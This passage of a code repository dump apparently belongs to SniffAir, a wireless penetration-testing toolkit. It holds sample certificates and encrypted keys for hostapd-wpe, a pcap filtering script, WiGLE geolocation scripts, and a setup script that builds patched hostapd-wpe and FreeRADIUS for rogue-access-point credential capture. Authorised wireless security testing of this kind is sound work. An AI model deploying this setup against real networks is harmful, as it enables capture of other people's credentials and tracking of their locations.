rajeXxLOHQLimBOk564lzdN2SfEd5EzKypobb/A4ZDk2YzVzhtMVAVHhm1BIKiRk 16 | DIBH2f6PBZ7kOhCjYU5RkJ/osNCtAgkJ3vpbTs7nA/XMtjuGI4G4PLjGLYKecxN7 17 | yS8PekNLkwTSBQ== 18 | -----END CERTIFICATE REQUEST----- 19 | -------------------------------------------------------------------------------- /module/hostapd-wpe/certs/server.key: -------------------------------------------------------------------------------- 1 | -----BEGIN ENCRYPTED PRIVATE KEY----- 2 | MIIFHDBOBgkqhkiG9w0BBQ0wQTApBgkqhkiG9w0BBQwwHAQIu9mLL99UcV4CAggA 3 | MAwGCCqGSIb3DQIJBQAwFAYIKoZIhvcNAwcECAMkiv6SJ3YSBIIEyJ6mYHKmMPB0 4 | KXbnZCK+np/IkJbW6KNPKWSXNvX2myhE6uyFqxouVXDqblcGbqzLcU1Z0zSIFIm+ 5 | DpnaO2gR7rUbx6rpukS0jNinmWJAQOjww7wQ6FMKypLe+fOti9LA/HIpJg0mDw/g 6 | Q4Uf8SyuMxFMSeC7xgta+RDdQm3rUXu+Dolr+JKa5mFHKSKQuqgn8ZCwSNwj3ALt 7 | RGkdoiftoz+8bd71KJSOnfr8nZwZxvu3/HvnCmu8CeC0xByeG5iyJhhPX8al8VD9 8 | Ng/UIqXcguNGdpBpgRCXTs/1yyd8OC9PLDLofYqdifRGfl+jQrWeALjS+FG9Hw/f 9 | YCCXfIo04KLTx/CvDpRgRnW22LBqV7h4+oQWA9pdKWFO51J7HkcsYo7zpyO7w4D5 10 | Q+2Q03PlbyjuGtxW+xoUGNK8b64LvQIvdc77abeK9oK5D21+kAzxSiOIIfIZL0HM 11 | tzijOjR6JCJFACf0dbgOSMTn+vLNcMBsu1S9I0/oR/ZRikqlWXVsOMIjd8u0bN4d 12 | EYrjX1qzJPX8n9VXkSFS3k1mPLnZhvblM60RTe5vU47HHPOnk8gjrJ/XGAXNJxbh 13 | BQcqTDszuHuthRMbaVfVsoEteWu6T1z+3uHhJVeFuBR3YOQRIH84xQ5RJ867OilH 14 | IwETI3VJf5ZUaXaiHlhHYtP2oJfMF0+Etfx1WS5760hrTED+OmGIUt7I+4CXfjQi 15 | hNzMmsI0IIQ1cj2EkBWkxcuHrYWr2RV3SEAiJytHGO6ubNO0EgvO66eEme9YJuof 16 | 71u4YNQZnskAu8LfbhroPyfBbN/R5eG3MxDlTKmAxD/YZoZ5QoivBv2l3T2LRs60 17 | 1kl9Q2zdNzvKr4Qb6cHgV4Hpn0xlFYzYeNrCuS3uUVuXoAvRAy2byVa3u/ckZ+Ue 18 | oDZnd7Zs7DJuSlD6wZSvdGHYGdy54YAZPUttWz3WbmBiBlYv+pSs4w+RmgTdQKY6 19 | cXrH3ZCTJ3/0C28skFok4V8O1puxk6/FU1O1ejU/QkoVw9FEHIb/k53Vx+Wq6fQ0 20 | sMyRKegZVuMseG0ehUvc2tgPmJo0l5GSGwJkTfZBb+XnN8mHhNZF94pNb2oVOrBo 21 | 9ddJUXaBmRX9bo4yUZ74nkWiU4FOc9fVwE2jJTh/Qt8mlynd2b6OncXjsKSyHOLT 22 | 7ZWzFd9C8eNnKV1F31Tup9YCoRjG+rF9hiSW+0xMT+HsH4EM6QZqjyGCO8MD7jT6 23 | 97PJMIGKMcB/tP6kXroESX8BKhqjfTFT1cqFb8MEY63W0Bap8JeLMeps+kJ+Ovab 24 | ulVltXTBSNv2umCTVN3eAkb6xEWLKvNHSmN6DK4TIl1wByITONRzDmRQ+ZRo7zjq 25 | tYGXiLSa4UCXrvz+ut9iofrAAR7hutTV/uwwihmGGM/uhWXCyrm3vSbnxtys2th8 26 | cL1+9q+ua7URYPOTUjp14QNFMoI6DAHYHpf9WCIMN9QVszPMW9c9RPCTIZO8YDZy 27 | 8qw+ejrXoblJRQOxD+kMncEHCHP4VKD5OBTeJ/5aChIpC22tfTE8cOFLtIpwoJ3/ 28 | q08pzH8rvdbngaIGu5pc9iOU4pwsgM1X84vfc3T6V6h4jDo2P+VJULOfvl2XL2of 29 | pkW6BB0BK6/rhqxCFwf3JA== 30 | -----END ENCRYPTED PRIVATE KEY----- 31 | -------------------------------------------------------------------------------- /module/hostapd-wpe/certs/server.p12: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Tylous/SniffAir/3dfbc2db650ff47cf10d8cbf089881405f08e6f4/module/hostapd-wpe/certs/server.p12 -------------------------------------------------------------------------------- /module/hostapd-wpe/certs/server.pem: -------------------------------------------------------------------------------- 1 | Bag Attributes 2 | localKeyID: 09 10 79 5E 4A 86 DC 15 7D 87 90 BA F2 A6 AF 11 DA 9A 61 2E 3 | subject=/C=FR/ST=Radius/O=Example Inc./CN=Example Server Certificate/emailAddress=admin@example.com 4 | issuer=/C=FR/ST=Radius/L=Somewhere/O=Example Inc./emailAddress=admin@example.com/CN=Example Certificate Authority 5 | -----BEGIN CERTIFICATE----- 6 | MIIDojCCAoqgAwIBAgIBATANBgkqhkiG9w0BAQQFADCBkzELMAkGA1UEBhMCRlIx 7 | DzANBgNVBAgMBlJhZGl1czESMBAGA1UEBwwJU29tZXdoZXJlMRUwEwYDVQQKDAxF 8 | eGFtcGxlIEluYy4xIDAeBgkqhkiG9w0BCQEWEWFkbWluQGV4YW1wbGUuY29tMSYw 9 | JAYDVQQDDB1FeGFtcGxlIENlcnRpZmljYXRlIEF1dGhvcml0eTAeFw0xNzA5MTUw 10 | MjQ0NDZaFw0xODA5MTUwMjQ0NDZaMHwxCzAJBgNVBAYTAkZSMQ8wDQYDVQQIDAZS 11 | YWRpdXMxFTATBgNVBAoMDEV4YW1wbGUgSW5jLjEjMCEGA1UEAwwaRXhhbXBsZSBT 12 | ZXJ2ZXIgQ2VydGlmaWNhdGUxIDAeBgkqhkiG9w0BCQEWEWFkbWluQGV4YW1wbGUu 13 | Y29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqu1U3D9tREAmNqA2 14 | qHccAqVMuGl5lUJTqTiivFGfbkerVfiUKEwXgRcvAjp9lPtOuciHI/hohaFSA3X7 15 | y3YaBGRiyYigGd9GTAdbneNriP975pln07f/951iNNz+uClF6sLVt2ITkIETDp4w 16 | buVNIqUapZ3Ct5EzgOubLm3Yd3X2UbumbbphcufzRvNfoinaoejmriEJKOzzYnBC 17 | gNQ992P0H4Rgy8q1ATLqHYu75VieaYQKGnWJJpylcduodwB5XdR9HKbdfgY2a3+p 18 | Wnzpa7z8zVgDVMowI2a0wSs51sdoQxIEeVmtFkjCw5RnVkQOtMYpBWo/ej2BmIZF 19 | XFOQIwIDAQABoxcwFTATBgNVHSUEDDAKBggrBgEFBQcDATANBgkqhkiG9w0BAQQF 20 | AAOCAQEAk8M7BD8vpNA+BU2LKjt1l3xJ4GniK0ugrce0ZxtHw9fUE2DjAgrPyCel 21 | opaPGEMW9QLtr+235mcw3SgICTuQGKY0FjpaEHZdobhShGk5zHbycpCMVy82W5lV 22 | AYMWIGNnEoegeD4eSue/WgHera5RVcxrLuQy6q6hcTP16ljDibaEqZ2uzvRCasX2 23 | qC99jD3pmfcK/MTEwzu5rcsNMIcFlsfnu3j9QxGh/o6HSxrxOLwbKA+C52NcyA1S 24 | tt3aMrG0+F2Vss83HCosQ8VSml10JXagVeC+gV0xV47lbgUZW6fb0e5mOeTaQuQI 25 | pSJwlxxoIS3XfhCkdgiZV8IN/JQeFw== 26 | -----END CERTIFICATE----- 27 | Bag Attributes 28 | localKeyID: 09 10 79 5E 4A 86 DC 15 7D 87 90 BA F2 A6 AF 11 DA 9A 61 2E 29 | Key Attributes: 30 | -----BEGIN ENCRYPTED PRIVATE KEY----- 31 | MIIFHDBOBgkqhkiG9w0BBQ0wQTApBgkqhkiG9w0BBQwwHAQIcBWAeN51k3ACAggA 32 | MAwGCCqGSIb3DQIJBQAwFAYIKoZIhvcNAwcECAx73sBH6PzFBIIEyPWuN6zFm6+X 33 | RyLcYmLj+/js568pIQD+XXl1U0HKHylFgOB4rmefznQXPwK7EZdsshSyaMKML1mF 34 | sCdSwrBzoaeltM2DfPveJ99xuVfGpWnsxRcSFtb7DhHHAuv6kfDDQIy9V1/Sj8h1 35 | srTLB+zNTqAbaTPi8QElPhsIMawW6+KV9eKtzmlhLG4ui3c3irs+38sn9IRUnoHi 36 | QRFUtI+7lRBrBUs6X+X5j7bAKtMx1ru5in8ssu4s1zkuJ2bEXL3RAwvEXjsEDCiR 37 | 3Fs8S6WQCWPwq6vyW6cZjqQs1pYf/aml9BNA/KmrOgqYxv6LjbYcMiwzOxZfmvVY 38 | TOYdL06vGJ93ShunzrnVLvDUU+DJvENh8IEbtNe579DRBG01IWyS9wZcU14hzZqE 39 | qc4pcX/RRpxS25mHwERRmKlZwWzVAO0NWR8cT0XadqZm7ITyRBzJxBhlcMS1PDbV 40 | AbHkIK8UKbhRkbdxumJjd4tV8XT7TZtsZE/wJGTGqYgc5zxxo+sO5nI8eIVGmtyC 41 | v9wFHpf3zfjNNJQHY4OQyVyKq4C29l2RayOm3LSKZ+sFHKrGDir7ftf9ovHMxHhH 42 | oLn6UVaFh7jX3IU/c2yN8S7opSoVxX4EBsWKvaiS6vtlDMlHywdrSODpF3CyheNK 43 | cWyu0/mdjcHhGZf3mVQJIz1Brco2JN24LGusp9ueQhophum5feZj2G7pxw6kyKt+ 44 | f5OvLHged6GnRlwx1J6q9hrpaMD8xZZQRV7A9YU1NDDTfixFJOc4Fxi0vctuSx0D 45 | oFshktEiv/symQJ5emyS5iEvO1DSTtqxWfdoXoh2p8RJdMwelCpdyvF0lYecUJvz 46 | r9VDShawMPGj1MrIRmX/brLeUnq8r1Ctp7ISpWHuQEpnrLx+IJXZwvSBPkokpaDf 47 | e8MJ1BNF05e0C29hqp+0P7GLPEIEHb/WTUwPO5LvXNSmE28+cD4Kyj1n4+RPOvXa 48 | npqk4nYx2jYGg7a1KlxLW9lLhH5zH046lRm12JO8bc3xKWr9acPNSBP2KwKQwM7W 49 | 5xEtLp+W9a+mVbAbp58WDWhMlzrZOEqDzxryWsZQxGwLctuzcMbFe/j5ae2b7sS9 50 | jfuEOXVVUVvXIzBIH6GK3mk+xMbnrT5mxjGRfL7sdeyglMyi7sLYemiNlHCOkrI6 51 | 1rMWQwG6VbWVwkj2a/AcCRy+x9Hb7R7hQXfquFNm8Q2S70IP6b/uw5o6n5ARS9/w 52 | jmAsrcN4wof/3th+owIWcCd1oztkh0cEFdMvaSj72prTwfw37y78q/vLq4bLZCht 53 | WDmlrIHldPTVZ+rGA0m6L0VG+jXoyCHsz+7x+Zu838KQGAdmh7o+y/U8aut8nxBg 54 | GU+6pJ6v60uyAfdxS33Mpwx4eC3Kaf3pz93qCcXaW0ITJUX1+UrciJcS6zKCc3Oe 55 | QaR7yyc7XBTPyfmM5KTn9uSJtbuNvkNuPzH6EnzFdQxWRM4kuOWBw+aEpDKn3aDZ 56 | GCw90BgdP/ss04oaEAMIyVlcWtMW7yN0E2cUnfDpktfMTKbSTb/ucrE2YRm5St1N 57 | seeYakIKkdd4aDqdgm1NxPvD9H9FL9q+SRwzVf8xYkQiWToDzuRxivTN/6gyhx0e 58 | sx4zth4Mk1VVNDAhRNWxYA== 59 | -----END ENCRYPTED PRIVATE KEY----- 60 | -------------------------------------------------------------------------------- /module/hostapd-wpe/certs/xpextensions: -------------------------------------------------------------------------------- 1 | # 2 | # File containing the OID's required for Windows. 3 | # 4 | # http://support.microsoft.com/kb/814394/en-us 5 | # 6 | [ xpclient_ext] 7 | extendedKeyUsage = 1.3.6.1.5.5.7.3.2 8 | 9 | [ xpserver_ext] 10 | extendedKeyUsage = 1.3.6.1.5.5.7.3.1 11 | 12 | # 13 | # Add this to the PKCS#7 keybag attributes holding the client's private key 14 | # for machine authentication. 15 | # 16 | # the presence of this OID tells Windows XP that the cert is intended 17 | # for use by the computer itself, and not by an end-user. 18 | # 19 | # The other solution is to use Microsoft's web certificate server 20 | # to generate these certs. 21 | # 22 | # 1.3.6.1.4.1.311.17.2 23 | -------------------------------------------------------------------------------- /module/proof_packet.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import logging 4 | logging.getLogger ( "scapy.runtime" ).setLevel ( logging.CRITICAL ) 5 | from scapy.all import * 6 | load_contrib ( 'ppi_cace' ) 7 | import sys, os, argparse 8 | sys.path.insert ( 0, '../lib/' ) 9 | from Queries import * 10 | 11 | parser = argparse.ArgumentParser () 12 | parser.add_argument ( '-S', '--ssid', metavar='SSID', dest='ssid', action='store', help=argparse.SUPPRESS, required=False ) 13 | parser.add_argument ( '-P', '--path', metavar='path', dest='path', action='store', help='path\n', required=False ) 14 | parser.add_argument ( '-W', '--workspace', metavar='database', dest='database', action='store', help='workspace name\n',required=True ) 15 | 16 | args = parser.parse_args () 17 | 18 | workspace = args.database 19 | q = queries () 20 | ws = q.db_connect ( '../' + workspace ) 21 | 22 | class colors: 23 | RD = '\033[91m' 24 | NRM = '\033[0m' 25 | 26 | 27 | Beacon = 0 28 | ProbeRequest = 0 29 | ProbeResponses = 0 30 | EAPP = 0 31 | 32 | def packet(pkt): 33 | global Beacon 34 | global ProbeRequest 35 | global ProbeResponses 36 | global EAPP 37 | try: 38 | if args.ssid: 39 | SSID_List = args.ssid 40 | MAC_List = str ( q.show_MACs ( SSID_List ) ) 41 | MAC_List = MAC_List.split ( '\n' ) 42 | else: 43 | sql = dp.read_sql ( 'select * from INSCOPE_SSIDS', ws ) 44 | if sql.empty: 45 | print "No inscope SSIDSs found, please add a SSID before running this module again.\n" 46 | return 47 | else: 48 | SSID_List = str ( q.show_inscope_ssids () ) 49 | SSID_List = SSID_List.split ( '\n' ) 50 | MAC_List = str ( q.show_inscope_MACs () ) 51 | MAC_List = MAC_List.split ( '\n' ) 52 | 53 | if pkt.haslayer ( Dot11 ): 54 | if pkt.type == 0 and pkt.subtype == 8: 55 | SSID = pkt[Dot11Elt:1].info 56 | SSID = SSID.decode ( 'utf-8', 'ignore' ) 57 | if SSID in SSID_List: 58 | Beacon += 1 59 | if args.path: 60 | wrpcap (args.path + '/filtered.pcap', pkt, append=True ) 61 | else: 62 | wrpcap ( path+'/filtered.pcap', pkt, append=True ) 63 | elif pkt.type == 0 and pkt.subtype == 4: 64 | SSID = pkt[Dot11Elt:1].info 65 | SSID = SSID.decode ( 'utf-8', 'ignore' ) 66 | if SSID in SSID_List: 67 | ProbeRequest += 1 68 | if args.path: 69 | wrpcap (args.path + '/filtered.pcap', pkt, append=True ) 70 | else: 71 | wrpcap (path+'/filtered.pcap', pkt, append=True ) 72 | elif pkt.type == 0 and pkt.subtype == 5: 73 | MAC = pkt.addr2 74 | if MAC in MAC_List: 75 | ProbeResponses += 1 76 | if args.path: 77 | wrpcap (args.path + '/filtered.pcap', pkt, append=True ) 78 | else: 79 | wrpcap ( path+'/filtered.pcap', pkt, append=True ) 80 | if pkt.haslayer ( EAP ): 81 | src_MAC = pkt[Dot11].addr2 82 | dst_MAC = pkt[Dot11].addr1 83 | if src_MAC in MAC_List or dst_MAC in MAC_List: 84 | EAPP += 1 85 | if args.path: 86 | wrpcap (args.path + '/filtered.pcap', pkt, append=True ) 87 | else: 88 | wrpcap ( path+'/filtered.pcap', pkt, append=True ) 89 | except pandas.io.sql.DatabaseError: 90 | print colors.RD + "Error: SSID does not exist.\n" + colors.NRM 91 | sys.exit() 92 | 93 | 94 | path = workspace.split("/") 95 | path = '/'.join(path[0:2]) 96 | path = "../" + path 97 | for file in os.listdir(path): 98 | if file.endswith(".pcapdump"): 99 | fullpath = (os.path.join(path, file)) 100 | print "[*] Parsing file : " + file 101 | sniff (offline=fullpath, count=0, store=0, prn=packet) 102 | 103 | print "[*] "+ str(Beacon) + " Beacon Frames Added" 104 | print "[*] "+ str(ProbeRequest) + " Probe Request Frames Added" 105 | print "[*] "+ str(ProbeResponses) + " Probe Responses Frames Added" 106 | print "[*] "+ str(EAPP) + " EAP Frames Added" 107 | -------------------------------------------------------------------------------- /module/wigleSearchBSSID.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | from gmplot import gmplot 3 | import sys 4 | import requests 5 | import json 6 | from requests.auth import HTTPBasicAuth 7 | 8 | wigle_username = sys.argv[1] 9 | wigle_password = sys.argv[2] 10 | BSSID = sys.argv[3] 11 | 12 | payload = {'netid': BSSID, 'api_key': (wigle_username + wigle_password).encode('base64','strict')} 13 | results = requests.get(url='https://api.wigle.net/api/v2/network/search', params=payload, auth=HTTPBasicAuth(wigle_username, wigle_password)).json() 14 | 15 | lat = 0.0 16 | lon = 0.0 17 | 18 | for result in results['results']: 19 | lat = float(result['trilat']) 20 | lon = float(result['trilong']) 21 | 22 | print"Creating map..." 23 | #setup map in AoI 24 | gmap = gmplot.GoogleMapPlotter(lat, lon, 6) 25 | gmap.marker(lat, lon, color='#FF0000', title=BSSID) 26 | 27 | #detail search aka every observation 28 | results = requests.get(url='https://api.wigle.net/api/v2/network/detail', params=payload, auth=HTTPBasicAuth(wigle_username, wigle_password)) 29 | json_data = json.loads(results.text) 30 | 31 | print "Creating markers..." 32 | for x in json_data[u'results']: 33 | for y in x[u'locationData']: 34 | #drop marker 35 | gmap.marker(y[u'latitude'], y[u'longitude'], color='#FF0000', title=BSSID) 36 | 37 | print "Creating wiglemap.html..." 38 | gmap.draw("wiglemap.html") 39 | 40 | 41 | -------------------------------------------------------------------------------- /module/wigleSearchESSID.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | from gmplot import gmplot 3 | import requests 4 | from requests.auth import HTTPBasicAuth 5 | import sys 6 | 7 | wigle_username = sys.argv[1] 8 | wigle_password = sys.argv[2] 9 | ESSID = sys.argv[3] 10 | 11 | payload = {'ssid': ESSID, 'api_key': (wigle_username + wigle_password).encode('base64','strict')} 12 | results = requests.get(url='https://api.wigle.net/api/v2/network/search', params=payload, auth=HTTPBasicAuth(wigle_username, wigle_password)).json() 13 | 14 | lat = 39.7392 15 | lon = -104.9903 16 | 17 | print "Creating map..." 18 | #setup map in AoI 19 | gmap = gmplot.GoogleMapPlotter(lat, lon, 5) 20 | 21 | print "Creating markers..." 22 | for result in results['results']: 23 | lat = float(result['trilat']) 24 | lon = float(result['trilong']) 25 | #drop marker for each point 26 | gmap.marker(lat, lon, color='#FF0000', title=ESSID) 27 | 28 | print "Creating wiglemap.html..." 29 | gmap.draw("wiglemap.html") 30 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | pandas 2 | logging 3 | PrettyTable 4 | tabulate 5 | scapy 6 | requests 7 | gmplot 8 | -------------------------------------------------------------------------------- /setup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if lsb_release -d | grep -q "Kali" 3 | then 4 | Release=Kali 5 | apt-get update -y 6 | apt-get install -y dnsmasq libssl1.0-dev libnfnetlink-dev libnl-genl-3-dev wireshark tcpdump python-setuptools ca-certificates git make wget gcc pkg-config libnl-3-dev easy_install pip 7 | pushd module/Auto_EAP/ 8 | python RunMeFirst.py 9 | popd 10 | pushd module/ 11 | wget ftp://ftp.freeradius.org/pub/radius/old/freeradius-server-2.1.12.tar.bz2 12 | tar -jxvf freeradius-server-2.1.12.tar.bz2 13 | mv freeradius-server-2.1.12 freeradius 14 | rm -rf freeradius-server-2.1.12.tar.bz2 15 | pushd freeradius 16 | patch -p1 < ../gtc/PuNk1n.patch 17 | ./configure 18 | make 19 | make install 20 | ldconfig 21 | mv /usr/local/etc/raddb/eap.conf /usr/local/etc/raddb/eap.conf.bak 22 | mv ../gtc/eap.conf /usr/local/etc/raddb/eap.conf 23 | mv /usr/local/etc/raddb/clients.conf /usr/local/etc/raddb/clients.conf.bak 24 | mv ../gtc/clients.conf /usr/local/etc/raddb/clients.conf 25 | popd 26 | wget https://w1.fi/releases/hostapd-2.6.tar.gz 27 | tar -xzf hostapd-2.6.tar.gz 28 | mv hostapd-2.6/ hostapd/ 29 | rm -rf hostapd-2.6.tar.gz 30 | pushd hostapd/ 31 | patch -p1 < ../hostapd-wpe/hostapd-wpe.patch 32 | pushd hostapd 33 | make 34 | popd 35 | popd 36 | pushd hostapd-wpe/certs 37 | ./bootstrap 38 | popd 39 | popd 40 | elif lsb_release -d | grep -q "Ubuntu" 41 | then 42 | Release=Ubuntu 43 | apt-get update -y 44 | apt-get install -y dnsmasq libssl-dev libnfnetlink-dev libnl-genl-3-dev wireshark tcpdump python-setuptools ca-certificates git make wget gcc pkg-config libnl-3-dev 45 | easy_install pip 46 | pushd module/Auto_EAP/ 47 | python RunMeFirst.py 48 | popd 49 | pushd module/ 50 | pushd module/Auto_EAP/ 51 | python RunMeFirst.py 52 | popd 53 | pushd module/ 54 | wget ftp://ftp.freeradius.org/pub/radius/old/freeradius-server-2.1.12.tar.bz2 55 | tar -jxvf freeradius-server-2.1.12.tar.bz2 56 | mv freeradius-server-2.1.12 freeradius 57 | rm -rf freeradius-server-2.1.12.tar.bz2 58 | pushd freeradius 59 | patch -p1 < ../gtc/PuNk1n.patch 60 | ./configure 61 | make 62 | make install 63 | ldconfig 64 | mv /usr/local/etc/raddb/eap.conf /usr/local/etc/raddb/eap.conf.bak 65 | mv ../gtc/eap.conf /usr/local/etc/raddb/eap.conf 66 | mv /usr/local/etc/raddb/clients.conf /usr/local/etc/raddb/clients.conf.bak 67 | mv ../gtc/clients.conf /usr/local/etc/raddb/clients.conf 68 | popd 69 | wget https://w1.fi/releases/hostapd-2.6.tar.gz 70 | tar -xzf hostapd-2.6.tar.gz 71 | mv hostapd-2.6/ hostapd/ 72 | rm -rf hostapd-2.6.tar.gz 73 | pushd hostapd/ 74 | patch -p1 < ../hostapd-wpe/hostapd-wpe.patch 75 | pushd hostapd 76 | make 77 | popd 78 | popd 79 | pushd hostapd-wpe/certs 80 | ./bootstrap 81 | popd 82 | popd 83 | elif lsb_release -d | grep -q "Gentoo" 84 | then 85 | Release=Gentoo 86 | emerge --sync 87 | emerge --oneshot portage 88 | emerge net-dns/dnsmasq dev-vcs/git net-misc/wget net-analyzer/wireshark net-analyzer/tcpdump app-misc/ca-certificates sys-devel/make sys-devel/gcc dev-util/pkgconfig dev-libs/libnl dev-python/setuptools net-libs/libnfnetlink dev-libs/openssl dev-python/pip 89 | pushd module/Auto_EAP/ 90 | python RunMeFirst.py 91 | popd 92 | pushd module/ 93 | pushd module/Auto_EAP/ 94 | python RunMeFirst.py 95 | popd 96 | pushd module/ 97 | wget ftp://ftp.freeradius.org/pub/radius/old/freeradius-server-2.1.12.tar.bz2 98 | tar -jxvf freeradius-server-2.1.12.tar.bz2 99 | mv freeradius-server-2.1.12 freeradius 100 | rm -rf freeradius-server-2.1.12.tar.bz2 101 | pushd freeradius 102 | patch -p1 < ../gtc/PuNk1n.patch 103 | ./configure 104 | make 105 | make install 106 | ldconfig 107 | mv /usr/local/etc/raddb/eap.conf /usr/local/etc/raddb/eap.conf.bak 108 | mv ../gtc/eap.conf /usr/local/etc/raddb/eap.conf 109 | mv /usr/local/etc/raddb/clients.conf /usr/local/etc/raddb/clients.conf.bak 110 | mv ../gtc/clients.conf /usr/local/etc/raddb/clients.conf 111 | popd 112 | wget https://w1.fi/releases/hostapd-2.6.tar.gz 113 | tar -xzf hostapd-2.6.tar.gz 114 | mv hostapd-2.6/ hostapd/ 115 | rm -rf hostapd-2.6.tar.gz 116 | pushd hostapd/ 117 | patch -p1 < ../hostapd-wpe/hostapd-wpe.patch 118 | pushd hostapd 119 | make 120 | popd 121 | popd 122 | pushd hostapd-wpe/certs 123 | ./bootstrap 124 | popd 125 | popd 126 | elif lsb_release -d | grep -q "Debian" 127 | then 128 | Release=Debian 129 | apt-get update -y 130 | apt-get install -y dnsmasq libssl1.0-dev libnfnetlink-dev libnl-genl-3-dev build-essential gcc wireshark tcpdump python-setuptools ca-certificates git make wget libnl-3-dev pkg-config 131 | easy_install pip 132 | pushd module/Auto_EAP/ 133 | python RunMeFirst.py 134 | popd 135 | pushd module/ 136 | pushd module/Auto_EAP/ 137 | python RunMeFirst.py 138 | popd 139 | pushd module/ 140 | wget ftp://ftp.freeradius.org/pub/radius/old/freeradius-server-2.1.12.tar.bz2 141 | tar -jxvf freeradius-server-2.1.12.tar.bz2 142 | mv freeradius-server-2.1.12 freeradius 143 | rm -rf freeradius-server-2.1.12.tar.bz2 144 | pushd freeradius 145 | patch -p1 < ../gtc/PuNk1n.patch 146 | ./configure 147 | make 148 | make install 149 | ldconfig 150 | mv /usr/local/etc/raddb/eap.conf /usr/local/etc/raddb/eap.conf.bak 151 | mv ../gtc/eap.conf /usr/local/etc/raddb/eap.conf 152 | mv /usr/local/etc/raddb/clients.conf /usr/local/etc/raddb/clients.conf.bak 153 | mv ../gtc/clients.conf /usr/local/etc/raddb/clients.conf 154 | popd 155 | wget https://w1.fi/releases/hostapd-2.6.tar.gz 156 | tar -xzf hostapd-2.6.tar.gz 157 | mv hostapd-2.6/ hostapd/ 158 | rm -rf hostapd-2.6.tar.gz 159 | pushd hostapd/ 160 | patch -p1 < ../hostapd-wpe/hostapd-wpe.patch 161 | pushd hostapd/ 162 | make 163 | popd 164 | popd 165 | pushd hostapd-wpe/certs 166 | ./bootstrap 167 | popd 168 | popd 169 | else 170 | echo -ne "Unknown/Unsupported Distro\n" 171 | echo -ne "Quiting...\n" 172 | exit 1 173 | fi 174 | 175 | rm -rf db/.keep 176 | 177 | echo -ne "Below are is the contents of the requirement, if you wish to install them please enter yes. Note that SniffAir will not run properly without them.\n" 178 | echo -ne "[*] pandas\n" 179 | echo -ne "[*] logging\n" 180 | echo -ne "[*] PrettyTable\n" 181 | echo -ne "[*] tabulate\n" 182 | echo -ne "[*] scapy\n" 183 | echo -ne "[*] gmplot\n" 184 | echo -ne "[*] requests\n" 185 | echo -n "Do you wish to install these python modules? [y/n]" 186 | read answer 187 | if echo "$answer" | grep -iq "^y" ;then 188 | 189 | 190 | pip2 install -r requirements.txt --user 191 | echo -e "[+]All Dependencies installed. Run SniffAir.py to use SniffAir\n" 192 | else : 193 | echo -e "[-] ERROR: Dependencies not installed. SniffAir will not be able to run until they are installed\n" 194 | exit 1 195 | 196 | fi 197 | 198 | --------------------------------------------------------------------------------